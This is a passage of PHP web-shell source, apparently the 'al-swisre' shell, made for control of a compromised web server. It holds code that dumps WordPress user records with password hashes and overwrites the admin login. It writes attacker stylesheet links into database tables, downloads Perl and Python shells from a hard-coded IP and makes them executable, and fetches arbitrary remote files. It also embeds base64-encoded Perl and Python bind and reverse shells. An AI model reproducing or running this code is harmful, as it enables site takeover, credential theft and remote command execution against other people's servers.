  1795. <tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
  1796. echo "</table></div>";
  1797. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1798. exit;
  1799.  
  1800.  
  1801.  
  1802. }
  1803.  
  1804. }
  1805.  
  1806.  
  1807. else if ($op == 'rtrak')
  1808.  
  1809. {
  1810.  
  1811. $page = $_GET['page'];
  1812. $numpr = 25;
  1813. if(!$page){$page = 0;}
  1814. $sql0 = mysql_query("Select * from tblticketreplies");
  1815. $num_r0s = mysql_num_rows($sql0);
  1816.  
  1817.  
  1818. $sql = mysql_query("Select * from tblticketreplies order by id desc limit $page,$numpr");
  1819.  
  1820. $ap = 1;
  1821. echo "<br /><br /><div>Page  : ";
  1822. for ($s = 0 ; $s < $num_r0s; $s = $s+$numpr )
  1823. {
  1824.  
  1825. if ($page != $s) { echo "<a class='hr' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
  1826. else {echo "<a class='hr2' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
  1827.  
  1828.  
  1829. $ap ++;
  1830.  
  1831. }
  1832.  
  1833. echo "</div><br />";
  1834.  
  1835.  
  1836. while ($r3o = mysql_fetch_assoc($sql))
  1837. {
  1838.  
  1839. $email   = $r3o['email'];
  1840. $date    = $r3o['date'];
  1841. $message = $r3o['message'];
  1842. echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
  1843.  
  1844. echo "<tr><td>email : $email </td><td>date : $date </td></tr>
  1845. <tr > <td>message</td> <td colspan='2'>$message</td><br /><br /></tr>";
  1846. echo "</table></div>";
  1847. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1848. exit;
  1849.  
  1850.  
  1851.  
  1852. }
  1853.  
  1854. }
  1855.  
  1856.  
  1857. /////////////////////////////////// backup //////////////////////////
  1858.  
  1859. else if ($op == 'bkup')
  1860. {
  1861.  
  1862.  
  1863.  
  1864.  
  1865.  
  1866.  
  1867. if (isset($_POST['viw']))
  1868. {
  1869.  
  1870.  
  1871.  
  1872. $path = $_POST['path'];
  1873.  
  1874. $domp = @backup_tables($path,$host_c,$user_c,$pass_c,$db_c);
  1875.  
  1876.  
  1877.   echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Create backup successfully <br /><br /> $path</div>  </center>";
  1878.   echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1879.   exit;
  1880.  
  1881.  
  1882.  
  1883.  
  1884.  
  1885.  
  1886. }
  1887. else
  1888. {
  1889.  
  1890. echo'<form method="post">
  1891.  <br /><br />
  1892. path backup <br /><br /><input type="text" name="path" /><br /><br />
  1893. <input type="submit" name="viw" value="Create"  />
  1894.  
  1895. </form>';
  1896. exit;
  1897.  
  1898.  
  1899.  
  1900.  
  1901.  
  1902. }
  1903.  
  1904.  
  1905. }
  1906.  
  1907.  
  1908.  
  1909.  
  1910.  
  1911.  else if ($op == 'sh3')
  1912.  
  1913. {
  1914.  
  1915. if (isset($_POST['viw']))
  1916. {
  1917.  
  1918. $string = $_POST['string'];
  1919. $ch = $_POST['ch'];
  1920.  
  1921. if ($ch == 'trs')
  1922. {
  1923.    $sql4 = @mysql_query("Select * from tblticketreplies WHERE `message` LIKE '%$string%'");
  1924.  
  1925. }
  1926.  
  1927. else if($ch == 'tr')
  1928.   {
  1929.    $sql4 = @mysql_query("Select * from tbltickets WHERE `message` LIKE '%$string%'  ");
  1930.   }
  1931.  
  1932.  
  1933.  
  1934.  
  1935. $nu0 = @mysql_num_rows($sql4);
  1936. if ($nu0 == 0){echo "No result"; exit;}
  1937.  
  1938. while ($r33o = mysql_fetch_assoc($sql4))
  1939. {
  1940.  
  1941.  
  1942. $date    = $r33o['date'];
  1943. $title   = $r33o['title'];
  1944. $message = $r33o['message'];
  1945. echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
  1946.  
  1947. echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
  1948. <tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
  1949. echo "</table></div>";
  1950. exit;
  1951.  
  1952.  
  1953.  
  1954. }
  1955.  
  1956.  
  1957.  
  1958.  
  1959.  
  1960. }
  1961. else
  1962. {
  1963.  
  1964. echo'<form method="post">
  1965.  <br /><br />
  1966. search : <input type="text" name="string" />&nbsp;&nbsp;<select name="ch">
  1967. <option value="tr">ticket</option>
  1968. <option value="trs">ticket replies</option>
  1969. </select> <br /><br />
  1970. <input type="submit" name="viw" value="search"  />
  1971.  
  1972. </form>';
  1973. exit;
  1974.  
  1975.  
  1976.  
  1977.  
  1978.  
  1979. }
  1980. }
  1981.  
  1982.  
  1983.  
  1984.  
  1985. else if ($op == 'sh3')
  1986.  
  1987. {
  1988.  
  1989. if (isset($_POST['viw']))
  1990. {
  1991.  
  1992. $string = $_POST['string'];
  1993. $ch = $_POST['ch'];
  1994.  
  1995. if ($ch == 'trs')
  1996. {
  1997.    $sql4 = @mysql_query("Select * from tblticketreplies WHERE `message` LIKE '%$string%'");
  1998.  
  1999. }
  2000.  
  2001. else if($ch == 'tr')
  2002.   {
  2003.    $sql4 = @mysql_query("Select * from tbltickets WHERE `message` LIKE '%$string%'  ");
  2004.   }
  2005.  
  2006.  
  2007.  
  2008.  
  2009. $nu0 = @mysql_num_rows($sql4);
  2010. if ($nu0 == 0){echo "No result"; exit;}
  2011.  
  2012. while ($r33o = @mysql_fetch_assoc($sql4))
  2013. {
  2014.  
  2015.  
  2016. $date    = $r33o['date'];
  2017. $title   = $r33o['title'];
  2018. $message = $r33o['message'];
  2019. echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
  2020.  
  2021. echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
  2022. <tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
  2023. echo "</table></div>";
  2024.  
  2025.  
  2026.  
  2027.  
  2028. }
  2029.  
  2030.  
  2031.  
  2032.  
  2033.  
  2034. }
  2035. else
  2036. {
  2037.  
  2038. echo'<form method="post">
  2039.  <br /><br />
  2040. search : <input type="text" name="string" />&nbsp;&nbsp;<select name="ch">
  2041. <option value="tr">ticket</option>
  2042. <option value="trs">ticket replies</option>
  2043. </select> <br /><br />
  2044. <input type="submit" name="viw" value="search"  />
  2045.  
  2046. </form>';
  2047.  
  2048. exit;
  2049.  
  2050.  
  2051.  
  2052.  
  2053. }
  2054. }
  2055.  
  2056.  
  2057. else if ($op == 'css')
  2058.  
  2059. {
  2060.  
  2061. if (isset($_POST['viw']))
  2062. {
  2063.    $index = $_POST['index'];
  2064.    $seh = $_POST['string'];
  2065.    $rs = search($seh);
  2066.     if(count($rs) == 0){echo 'No result';exit;}
  2067.     foreach ($rs as $info)
  2068.     {
  2069.  
  2070.    $table = $info['table'];
  2071.    $column = $info['column'];
  2072.  
  2073.    echo "table :  $table<br /><br />
  2074.  
  2075.    column : $column
  2076.    <form method=\"post\">
  2077.  <br /><br />
  2078. <input type='submit' name='v' value=\"inject\"  />
  2079.             <input type='hidden' name=\"index\" value=$index>
  2080.             <input type=\"hidden\" name=\"table\" value='$table'>
  2081.             <input type=\"hidden\" name=\"column\" value='$column' >
  2082.             <input type=\"hidden\" name=\"shearc\" value='$seh'>
  2083. </form>
  2084. ";
  2085.  
  2086. exit;
  2087.  
  2088.  
  2089.  
  2090.  
  2091.  
  2092.  
  2093.  
  2094.     }
  2095.  
  2096.  
  2097.  
  2098.  
  2099.  
  2100.  
  2101.  
  2102. }
  2103. else
  2104. {
  2105.  
  2106. echo'<form method="post">
  2107.  <br /><br />
  2108. search : <input type="text" name="string" />
  2109. <br />
  2110. Css url : <input type="text" name="index"><br /><br />
  2111. <input type="submit" name="viw" value="search"  />
  2112.  
  2113. </form>';
  2114. exit;
  2115.  
  2116.  
  2117.  
  2118.  
  2119.  
  2120. }
  2121.  
  2122.    if (isset($_POST['v']))
  2123.    {
  2124.  
  2125.    $seh = $_POST['shearc'] ;
  2126.    $table = $_POST['table'];
  2127.    $column = $_POST['column'] ;
  2128.    $rlcss = $_POST['index'] ;
  2129.  
  2130.      $data = "<head><link href=$rlcss rel=stylesheet></head>";
  2131.  
  2132.     $query = mysql_query("UPDATE ".$table." SET ".$column." ='$data' WHERE `$column` LIKE '%$seh%'") or die(mysql_error());
  2133.     if($query){
  2134.         echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Injection has been successfully</div>  </center>";
  2135.         echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  2136.         exit;
  2137.     }else{
  2138.         echo '<center><br /><div style=\"color: #003300;  font-weight: bold\"> Injection erorr</div>';
  2139.  
  2140.  
  2141.         exit;
  2142.     }
  2143.  
  2144.  
  2145.    }
  2146.  
  2147.  
  2148. }
  2149.  
  2150.  
  2151. else if ($op == 'awp')
  2152.  
  2153. {
  2154.  
  2155.  
  2156.  
  2157. if (isset($_POST['viw']))
  2158. {
  2159.  
  2160. $pass = $_POST['pass'];
  2161. $user = $_POST['user'];
  2162.  
  2163.  
  2164. $crypt = crypt($pass);
  2165.  
  2166. $query =@mysql_query("UPDATE `wp_users` SET `user_login` ='".$user."' WHERE ID = 1") or die;
  2167. $query =@mysql_query("UPDATE `wp_users` SET `user_pass` ='".$crypt."' WHERE ID = 1") or die;
  2168.  
  2169. if ($query)
  2170. {
  2171.   echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Updated admin successfully </div>  </center>";
  2172.   echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  2173.   exit;
  2174. }
  2175. else if (!$query)
  2176. {
  2177.   echo "<center><br /><div style=\"color: red;  font-weight: bold\">Updated admin erorr </div>  </center>";
  2178.   echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  2179.   exit;
  2180.  
  2181. }
  2182.  
  2183.  
  2184.  
  2185.  
  2186.  
  2187.  
  2188.  
  2189. }
  2190. else
  2191. {
  2192.  
  2193. echo'<form method="post">
  2194.  <br /><br />
  2195. user : <input type="text" name="user" /><br /><br />
  2196. pass : <input type="text" name="pass" /><br /><br />
  2197. <input type="submit" name="viw" value="update"  />
  2198.  
  2199. </form>';
  2200.  
  2201.  
  2202.  
  2203.  
  2204.  
  2205. }
  2206. }
  2207.  
  2208.  
  2209. else if ($op == 'shwp')
  2210. {
  2211.  
  2212.  
  2213.  
  2214.  
  2215.  
  2216. $sql = 'select * from `wp_users`';
  2217. $query =@ mysql_query($sql);
  2218.  
  2219. if ($query)
  2220. {
  2221.  
  2222. while ($row = mysql_fetch_assoc($query))
  2223. {
  2224.  
  2225. echo "
  2226. <br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
  2227. <tr>
  2228.        <td>ID :</td>
  2229.        <td>user :</td>
  2230.        <td>pass :</td>
  2231.        <td>email :</td>
  2232.  
  2233. </tr>
  2234.  
  2235.  
  2236. <tr>
  2237.        <td>".$row['ID']."</td>
  2238.        <td>".$row['user_login']."</td>
  2239.        <td>".$row['user_pass']."</td>
  2240.         <td>".$row['user_email']."</td>
  2241. </tr>
  2242.  
  2243.  
  2244.  
  2245. </table>
  2246.  
  2247.  
  2248.   ";
  2249.  
  2250.   echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  2251.   exit;
  2252.  
  2253.  
  2254.  
  2255.  
  2256.  
  2257.  }}
  2258.  
  2259. }
  2260.  
  2261.  
  2262.  
  2263. }
  2264.  
  2265. break;
  2266.  
  2267.  
  2268.  
  2269. /////////////////////////////////////////////// info   ///////////////////////////////////
  2270. case 'info':
  2271.  
  2272. $sws = 'al-swisre' ;
  2273. if ($sws != 'al-swisre'){echo "Coded by al-swisre"; exit;}
  2274.  
  2275. if(strlen($dir)>1 && $dir[1]==":")
  2276. $os = "Windows";
  2277. else $os = "Linux";
  2278. $read = @file_get_contents("http://s92443018.onlinehome.us/cgi-bin/host.php?$ips");
  2279. $r3ad = @file_get_contents("http://aruljohn.com/track.pl?host=$ips") ;
  2280. $ipnet = @findit($read,"<td nowrap>IP-Network</td><td>&nbsp;</td><td nowrap>","</td>");
  2281. $ipb = @findit($read,"<td nowrap>IP-Network-Block</td><td>&nbsp;</td><td nowrap>","</td>");
  2282. $hostname = @findit($read,"Hostname:","<br>");
  2283. $isp = @findit($r3ad,"ISP</td><td>","</td>");
  2284.  
  2285.  
  2286.  
  2287.  
  2288.  
  2289.  
  2290. echo "<div class='info'><table cellpadding='0' align='center' width='60%' >
  2291. <tr><td colspan='2'>Information Server</td><tr>
  2292. <tr><td>Hostname</td><td>".$hostname."</td></tr>
  2293. <tr><td>ISP</td><td>".$isp."</td></tr>
  2294. <tr><td>IP-Network</td><td>".$ipnet."</td></tr>
  2295. <tr><td>IP-Network-Block</td><td>".$ipb."</td></tr>
  2296. <tr><td>Safe Mode</td><td>".(($safe_mode)?(" &nbsp;: <b><font color=red>ON</font></b>"):("<b><font color=green>OFF</font></b>"))."</td></tr>
  2297. <tr><td>System</td><td>".$os."</td></tr>
  2298. <tr><td>PHP Version </td><td>".phpversion()."</td></tr>
  2299. <tr><td>Zend Version </td><td>".@zend_version()."</td></tr>
  2300. <tr><td>Magic_Quotes </td><td>". magicQouts()."</td></tr>
  2301. <tr><td>Curl </td><td>".Curl()."</td></tr>
  2302. <tr><td>Register Globals </td><td>".RegisterGlobals()."</td></tr>
  2303. <tr><td>Open Basedir </td><td>".openBaseDir()."</td></tr>
  2304. <tr><td>Gzip </td><td>".Gzip()."</td></tr>
  2305. <tr><td>Free Space </td><td>".HardSize(disk_free_space('/'))."</td></tr>
  2306. <tr><td>Total Space </td><td>".HardSize(disk_total_space("/"))."</td></tr>
  2307. <tr><td>MySQL</td><td>".MySQL2()."</td></tr>
  2308. <tr><td>MsSQL</td><td>".MsSQL()." </td></tr>
  2309. <tr><td>PostgreSQL</td><td>".PostgreSQL()."</td> </tr>
  2310. <tr><td>Oracle</td><td>".Oracle()."</td></tr>";
  2311.  
  2312. exit;
  2313.  
  2314.  
  2315.  
  2316.  
  2317.  
  2318.  
  2319.  
  2320.  
  2321.  
  2322.  
  2323.  
  2324.  
  2325.  
  2326.  
  2327.  
  2328.  
  2329.  
  2330.  
  2331.  
  2332. break;
  2333.  
  2334.  
  2335. ///////////////////////////////// bypass ///////////////////////
  2336.  
  2337. case 'byp':
  2338.  
  2339.  
  2340. echo '<div class="cont3">
  2341. [ <a href="?sws=byp"> bypass </a>]
  2342.  
  2343. [<a href="?sws=byp&op=shell&sh=perl">Make Shell Perl</a>]
  2344.  
  2345. [<a href="?sws=byp&op=shell&sh=py"> Make Shell Python </a>]
  2346. [<a href="?sws=byp&op=g3t"> Get file </a>]
  2347.  
  2348. </div><br /><br />'  ;
  2349.  
  2350. $op = $_GET['op'];
  2351.  
  2352. if(@$_GET['dir']){
  2353.     $dir = $_GET['dir'];
  2354.     if($dir != 'nullz') $dir = @cleandir($dir);
  2355. }
  2356.  
  2357. if ($op == 'shell')
  2358. {
  2359.  
  2360.  
  2361. $sh = $_GET['sh'];
  2362. ////////////////////////// perl or python //////////////////////
  2363.  
  2364. if (!isset($_POST['get']))
  2365. {
  2366.  
  2367.  
  2368.  
  2369. echo "<form method='post'>
  2370. Path shell : <input type='text' name='path'  value='".$dir."/cgi-bin' size='30'/><br /><br />
  2371. name shell : <input type='text' name='name'  value='shell.sa' size='25' /><br /><br />
  2372. htaccess   :<br /><br /><textarea name='htx'>AddHandler cgi-script .sa</textarea>
  2373. <br /><br />
  2374. <input type='submit' name='get' value='Make' /></form>";
  2375.  
  2376. }else {
  2377.  
  2378.  
  2379. $path = $_POST['path'];
  2380. $name = $_POST['name'];
  2381. $htac = $_POST['htx'];
  2382.  
  2383. if (isset($htac))
  2384. {
  2385.  
  2386. $fop = @fopen("$path/.htaccess", 'w');
  2387.  
  2388. @fwrite($fop,$htac);
  2389.  
  2390. @fclose($fop);
  2391.  
  2392. }
  2393.  
  2394. $rpath = $path."/".$name;
  2395.  
  2396.  
  2397. if ($sh == 'perl')
  2398. {
  2399.     $url_shell  = 'http://64.15.137.117/~google/cgi-bin/perl.zip';   /// perl
  2400.     $path = $dir."/".$d3r."/"."sa.pl";
  2401.  
  2402. }
  2403. else if($sh == 'py')
  2404.  
  2405. {
  2406.  
  2407.     $url_shell  = 'http://64.15.137.117/~google/cgi-bin/python.zip';  /// python
  2408.     $path = $dir."/".$d3r."/"."sa.py";
  2409.  
  2410.  
  2411. }
  2412.  
  2413. //// get shell///
  2414.  
  2415.  
  2416.     $fp = @fopen($rpath, 'w');
  2417.  
  2418.     $ch = @curl_init($url_shell);
  2419.     @curl_setopt($ch, CURLOPT_FILE, $fp);
  2420.  
  2421.     $data = @curl_exec($ch);
  2422.  
  2423.     @curl_close($ch);
  2424.     @fclose($fp);
  2425.  
  2426.  
  2427.  
  2428. if (!is_file($rpath))
  2429. {
  2430.  
  2431.  
  2432.  
  2433.     $ch = @curl_init($url_shell);
  2434.     @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2435.  
  2436.     $data = @curl_exec($ch);
  2437.  
  2438.     @curl_close($ch);
  2439.  
  2440.     @file_put_contents($rpath, $data);
  2441.  
  2442. }elseif (@is_file($rpath)) {
  2443.  
  2444. $ch =@chmod($rpath,0755);
  2445.  
  2446. echo "Sh3ll have been created<br /><br />
  2447. $rpath";
  2448.  
  2449.  
  2450.  
  2451. }else {echo "error";}
  2452.  
  2453. }
  2454. }
  2455. ///////////////////// get file ////////////////////
  2456. elseif ($op == 'g3t')
  2457. {
  2458.  
  2459. if (!isset($_POST['get']))
  2460. {
  2461.  
  2462.  
  2463. echo 'Get file<br /><br /><br />
  2464. <form method="post">
  2465. <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
  2466. Url file : <input type="text" name="file" />&nbsp;&nbsp;
  2467. to : <input type="text" name="path" value="'.$dir.'/file.php"  /><br /><br />
  2468. <input type="submit" name="get" value="Get" />
  2469.  
  2470. </form>' ;exit;
  2471.  
  2472.  
  2473.  
  2474.  
  2475.  
  2476.  
  2477.  
  2478. }
  2479. else
  2480. {
  2481.  
  2482. $url_shell = $_POST['file'];
  2483. $path = $_POST['path'];
  2484.  
  2485.  
  2486.  
  2487.     $fp = @fopen($path, 'w');
  2488.  
  2489.     $ch = @curl_init($url_shell);
  2490.     @curl_setopt($ch, CURLOPT_FILE, $fp);
  2491.  
  2492.     $data = @curl_exec($ch);
  2493.  
  2494.     @curl_close($ch);
  2495.     @fclose($fp);
  2496.  
  2497.  
  2498.  
  2499. if (!is_file($path))
  2500. {
  2501.  
  2502.  
  2503.  
  2504.     $ch = @curl_init($url_shell);
  2505.     @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2506.  
  2507.     $data = @curl_exec($ch);
  2508.  
  2509.     @curl_close($ch);
  2510.  
  2511.     @file_put_contents($path, $data);
  2512.  
  2513. }elseif (@is_file($path)) {
  2514.  
  2515.  
  2516. echo "got the file successfully<br /><br />
  2517. $path"; exit;
  2518.  
  2519.  
  2520.  
  2521. }else {echo "error";}
  2522.  
  2523.  
  2524.  
  2525. }
  2526.  
  2527.  
  2528.  
  2529.  
  2530.  
  2531. }else if(!isset($op)) {}
  2532.  
  2533.  
  2534.  
  2535.  
  2536.  
  2537.  
  2538.  
  2539. break;
  2540.  
  2541. /////////////////////////////////////////////////// Connect Back ////////////////////////////////////
  2542.  
  2543. case 'con':
  2544.  
  2545.  
  2546.  
  2547. if (!isset($_POST['con']))
  2548. {
  2549. echo "";
  2550.  
  2551. echo "
  2552. <div class='conn'><table cellpadding='0' align='center'>
  2553. <br />
  2554. <form method=\"post\">
  2555. <tr><td>
  2556. <br />Back Connect :<br /> <br />
  2557. Ip : <input type=\"text\" name=\"ip\" value='". $_SERVER['REMOTE_ADDR'] ."' />&nbsp;&nbsp;&nbsp;
  2558. Port : <input type=\"text\" name=\"port\" />&nbsp;&nbsp;&nbsp;
  2559. <select name=\"op\">
  2560. <option value=\"php\">PHP</option>
  2561. <option value=\"perl\">Perl</option>
  2562. <option value=\"python\">Python</option>
  2563. </select>&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"con\" value=\"Connect\" /><br /> <br /><br /></td></tr>
  2564. <tr><td><br />Bind Connect :<br /><br />Port : <input type=\"text\" name=\"bind_port\" /> <select name=\"op\">
  2565. <option value=\"perl\">Perl</option>
  2566. <option value=\"python\">Python</option>
  2567. </select>
  2568. <input type=\"submit\" name=\"con\" value=\"Connect bind\" /> <br /><br /> <br /></td></tr>
  2569.  
  2570.  
  2571. </form>";
  2572.  
  2573. exit;
  2574.  
  2575. }else
  2576. {
  2577.  
  2578. if ($_POST['con'] == 'Connect') {
  2579.  
  2580.  
  2581.  
  2582. $ip = $_POST['ip'] ;
  2583. $port = $_POST['port'] ;
  2584. $op = $_POST['op'] ;
  2585.  
  2586. $bind_perl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  2587. $bind_py = "IyBTZXJ2ZXIgIA0KIA0KaW1wb3J0IHN5cyAgDQppbXBvcnQgc29ja2V0ICANCmltcG9ydCBvcyAgDQoNCmhvc3QgPSAnJzsgIA0KU0laRSA9IDUxMjsgIA0KDQp0cnkgOiAgDQogICAgIHBvcnQgPSBzeXMuYXJndlsxXTsgIA0KDQpleGNlcHQgOiAgDQogICAgIHBvcnQgPSAzMTMzNzsgIA0KIA0KdHJ5IDogIA0KICAgICBzb2NrZmQgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICwgc29ja2V0LlNPQ0tfU1RSRUFNKTsgIA0KDQpleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCg0KICAgICBwcmludCAiRXJyb3IgaW4gY3JlYXRpbmcgc29ja2V0IDogIixlIDsgIA0KICAgICBzeXMuZXhpdCgxKTsgICANCg0Kc29ja2ZkLnNldHNvY2tvcHQoc29ja2V0LlNPTF9TT0NLRVQgLCBzb2NrZXQuU09fUkVVU0VBRERSICwgMSk7ICANCg0KdHJ5IDogIA0KICAgICBzb2NrZmQuYmluZCgoaG9zdCxwb3J0KSk7ICANCg0KZXhjZXB0IHNvY2tldC5lcnJvciAsIGUgOiAgICAgICAgDQogICAgIHByaW50ICJFcnJvciBpbiBCaW5kaW5nIDogIixlOyANCiAgICAgc3lzLmV4aXQoMSk7ICANCiANCnByaW50KCJcblxuPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KcHJpbnQoIi0tLS0tLS0tIFNlcnZlciBMaXN0ZW5pbmcgb24gUG9ydCAlZCAtLS0tLS0tLS0tLS0tLSIgJSBwb3J0KTsgIA0KcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVxuXG4iKTsgDQogDQp0cnkgOiAgDQogICAgIHdoaWxlIDEgOiAjIGxpc3RlbiBmb3IgY29ubmVjdGlvbnMgIA0KICAgICAgICAgc29ja2ZkLmxpc3RlbigxKTsgIA0KICAgICAgICAgY2xpZW50c29jayAsIGNsaWVudGFkZHIgPSBzb2NrZmQuYWNjZXB0KCk7ICANCiAgICAgICAgIHByaW50KCJcblxuR290IENvbm5lY3Rpb24gZnJvbSAiICsgc3RyKGNsaWVudGFkZHIpKTsgIA0KICAgICAgICAgd2hpbGUgMSA6ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIGNtZCA9IGNsaWVudHNvY2sucmVjdihTSVpFKTsgIA0KICAgICAgICAgICAgIGV4Y2VwdCA6ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICBwaXBlID0gb3MucG9wZW4oY21kKTsgIA0KICAgICAgICAgICAgIHJhd091dHB1dCA9IHBpcGUucmVhZGxpbmVzKCk7ICANCiANCiAgICAgICAgICAgICBwcmludChjbWQpOyAgDQogICAgICAgICAgIA0KICAgICAgICAgICAgIGlmIGNtZCA9PSAnZzJnJzogIyBjbG9zZSB0aGUgY29ubmVjdGlvbiBhbmQgbW92ZSBvbiBmb3Igb3RoZXJzICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tLS0tLS0tLS0iKTsgIA0KICAgICAgICAgICAgICAgICBjbGllbnRzb2NrLnNodXRkb3duKCk7ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIG91dHB1dCA9ICIiOyAgDQogICAgICAgICAgICAgICAgICMgUGFyc2UgdGhlIG91dHB1dCBmcm9tIGxpc3QgdG8gc3RyaW5nICANCiAgICAgICAgICAgICAgICAgZm9yIGRhdGEgaW4gcmF3T3V0cHV0IDogIA0KICAgICAgICAgICAgICAgICAgICAgIG91dHB1dCA9IG91dHB1dCtkYXRhOyAgDQogICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgIGNsaWVudHNvY2suc2VuZCgiQ29tbWFuZCBPdXRwdXQgOi0gXG4iK291dHB1dCsiXHJcbiIpOyAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICBleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCiAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tIik7ICANCiAgICAgICAgICAgICAgICAgY2xpZW50c29jay5jbG9zZSgpOyAgDQogICAgICAgICAgICAgICAgIGJyZWFrOyAgDQpleGNlcHQgIEtleWJvYXJkSW50ZXJydXB0IDogIA0KIA0KDQogICAgIHByaW50KCJcblxuPj4+PiBTZXJ2ZXIgVGVybWluYXRlZCA8PDw8PFxuIik7ICANCiAgICAgcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KICAgICBwcmludCgiXHRUaGFua3MgZm9yIHVzaW5nIEFuaS1zaGVsbCdzIC0tIFNpbXBsZSAtLS0gQ01EIik7ICANCiAgICAgcHJpbnQoIlx0RW1haWwgOiBsaW9uYW5lZXNoQGdtYWlsLmNvbSIpOyAgDQogICAgIHByaW50KCI9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0iKTsNCg==";
  2588.  
  2589. $back_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
